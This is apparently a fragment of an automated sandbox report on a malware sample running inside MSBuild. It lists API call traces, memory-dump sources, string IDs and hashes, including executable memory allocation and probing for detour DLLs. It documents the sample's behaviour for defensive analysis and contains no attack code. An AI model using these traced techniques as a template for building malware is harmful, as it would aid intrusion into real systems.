                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2104210347-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,00406B2E,00000000), ref: 004066CF
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,00406B2E,00000000), ref: 00406703
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CAC6CCC
                                                                                                                                                                                                                                                                            • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CAC6D11
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(0000000C), ref: 6CAC6D26
                                                                                                                                                                                                                                                                              • Part of subcall function 6CACCA10: malloc.MOZGLUE(?), ref: 6CACCA26
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CAC6D35
                                                                                                                                                                                                                                                                            • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CAC6D53
                                                                                                                                                                                                                                                                            • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CAC6D73
                                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CAC6D80
                                                                                                                                                                                                                                                                            • CertGetNameStringW.CRYPT32 ref: 6CAC6DC0
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000000), ref: 6CAC6DDC
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CAC6DEB
                                                                                                                                                                                                                                                                            • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CAC6DFF
                                                                                                                                                                                                                                                                            • CertFreeCertificateContext.CRYPT32(00000000), ref: 6CAC6E10
                                                                                                                                                                                                                                                                            • CryptMsgClose.CRYPT32(00000000), ref: 6CAC6E27
                                                                                                                                                                                                                                                                            • CertCloseStore.CRYPT32(00000000,00000000), ref: 6CAC6E34
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32 ref: 6CAC6EF9
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000000), ref: 6CAC6F7D
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CAC6F8C
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CAC709D
                                                                                                                                                                                                                                                                            • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CAC7103
                                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CAC7153
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6CAC7176
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC7209
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC723A
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC726B
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC729C
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC72DC
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC730D
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000110), ref: 6CAC73C2
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC73F3
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC73FF
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC7406
                                                                                                                                                                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CAC740D
                                                                                                                                                                                                                                                                            • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CAC741A
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(?), ref: 6CAC755A
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CAC7568
                                                                                                                                                                                                                                                                            • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CAC7585
                                                                                                                                                                                                                                                                            • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CAC7598
                                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CAC75AC
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEAB89: EnterCriticalSection.KERNEL32(6CB3E370,?,?,?,6CAB34DE,6CB3F6CC,?,?,?,?,?,?,?,6CAB3284), ref: 6CAEAB94
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEAB89: LeaveCriticalSection.KERNEL32(6CB3E370,?,6CAB34DE,6CB3F6CC,?,?,?,?,?,?,?,6CAB3284,?,?,6CAD56F6), ref: 6CAEABD1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                                                                                                                            • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                                                                                                                            • API String ID: 3256780453-3980470659
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6CAC64DF
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6CAC64F2
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6CAC6505
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6CAC6518
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(user32.dll), ref: 6CAC652B
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CAC671C
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6CAC6724
                                                                                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CAC672F
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6CAC6759
                                                                                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6CAC6764
                                                                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6CAC6A80
                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CAC6ABE
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CAC6AD3
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CAC6AE8
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CAC6AF7
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                                                                                                                            • API String ID: 487479824-2878602165
                                                                                                                                                                                                                                                                            • Opcode ID: 1ba74c730150da8c86d0dae498ba06a22a5b7c437b53b201be6bff6fc13a3f44
                                                                                                                                                                                                                                                                            • Instruction ID: acf29f638cd3406cc12f90e6fdd6f15749f5e7d25bd557b1867eaef224c841e0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ba74c730150da8c86d0dae498ba06a22a5b7c437b53b201be6bff6fc13a3f44
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21F1E570A052299FDB20DF64CD48BEAB7B4AF45318F184299D81DA7781D731AEC4CF92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6CADEE7A
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CADEFB5
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?), ref: 6CAE1695
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CAE16B4
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6CAE1770
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CAE1A3E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memset$freemallocmemcpy
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3693777188-0
                                                                                                                                                                                                                                                                            • Opcode ID: f2a8e752f07a5cab40082f589b9ae840f68597a231a6d7f18106d2b7e03de75c
                                                                                                                                                                                                                                                                            • Instruction ID: 7271d2e8016b8b86dccd881b13b4bd85025d58ff6a67c8a9491553509ec468d9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2a8e752f07a5cab40082f589b9ae840f68597a231a6d7f18106d2b7e03de75c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FB33B71E00229CFCB14CFA9C890AADB7B2FF49304F1982A9D549AB755D730AD85DF90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(6CB3E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CAED1C5), ref: 6CADD4F2
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(6CB3E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CAED1C5), ref: 6CADD50B
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABCFE0: EnterCriticalSection.KERNEL32(6CB3E784), ref: 6CABCFF6
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABCFE0: LeaveCriticalSection.KERNEL32(6CB3E784), ref: 6CABD026
                                                                                                                                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CAED1C5), ref: 6CADD52E
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(6CB3E7DC), ref: 6CADD690
                                                                                                                                                                                                                                                                            • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CADD6A6
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(6CB3E7DC), ref: 6CADD712
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(6CB3E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CAED1C5), ref: 6CADD751
                                                                                                                                                                                                                                                                            • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CADD7EA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                                                                                                                            • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                                                                                                                            • API String ID: 2690322072-3894294050
                                                                                                                                                                                                                                                                            • Opcode ID: 2b5290bc34ab56172f7f6c269c205cfd1aef20034f118f422389373ebdb4b4be
                                                                                                                                                                                                                                                                            • Instruction ID: 3dd85083471c4d416c73beb83fd4a6851d60b5b84dbc783f522db672bde92660
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b5290bc34ab56172f7f6c269c205cfd1aef20034f118f422389373ebdb4b4be
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8591E471E147518FD714CF28C59476AB7E1EB89318F1A492EE49A87A80D730F884CF91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CB02C31
                                                                                                                                                                                                                                                                            • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CB02C61
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CAB4E5A
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAB4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CAB4E97
                                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CB02C82
                                                                                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CB02E2D
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAC81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CAC81DE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                                                                                                                                            • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                                                                                                                            • API String ID: 801438305-4149320968
                                                                                                                                                                                                                                                                            • Opcode ID: 9525ba0e6f1680b3618ca896fb7b6f0a232879e85090656aa8cda956c8c21e46
                                                                                                                                                                                                                                                                            • Instruction ID: b5a193ee56d6899a49279bf76cb5a09dc754fe3df4e5067eca19ccff7189701b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9525ba0e6f1680b3618ca896fb7b6f0a232879e85090656aa8cda956c8c21e46
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9591BE707087818FC724CF24C495AAEBBE1EF89258F104A1DE99A87750DB34D949CB53
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,000000FF,?), ref: 6CB28A4B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                            • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                            • Instruction ID: a7bc3bb7ab0cdafeb003da4676b69c84827a538cbbd4524cc15ca49530113834
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97B10972E0025A8FDB24CF68CC907E9B7B2EF95314F1802A9C44DDB785D734A989CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,000000FF,?), ref: 6CB288F0
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CB2925C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                            • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                            • Instruction ID: 17acd0b7ab795d9c1b6775329d1e812cc6f26cc00c6069ce3f7e650a15c99a72
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3B1C572E0024A8BDB14CF58CC816EDB7B2EF94314F180269C95DEB785D734A989CB90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(user32,?,6CAEE1A5), ref: 6CB15606
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(gdi32,?,6CAEE1A5), ref: 6CB1560F
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CB15633
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CB1563D
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CB1566C
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CB1567D
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CB15696
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CB156B2
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CB156CB
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CB156E4
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CB156FD
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CB15716
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CB1572F
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CB15748
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CB15761
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CB1577A
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CB15793
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CB157A8
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CB157BD
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CB157D5
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CB157EA
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CB157FF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                            • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                                                                                                                            • API String ID: 2238633743-1964193996
                                                                                                                                                                                                                                                                            • Opcode ID: ff29370bf292f6f614d9542ab34bfb9fd9ed9614d71e1a370fa6526841249486
                                                                                                                                                                                                                                                                            • Instruction ID: 8f58aefc439a2b8c70645f458a81a62927bb66312b22e0f686869b7abcc866ad
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff29370bf292f6f614d9542ab34bfb9fd9ed9614d71e1a370fa6526841249486
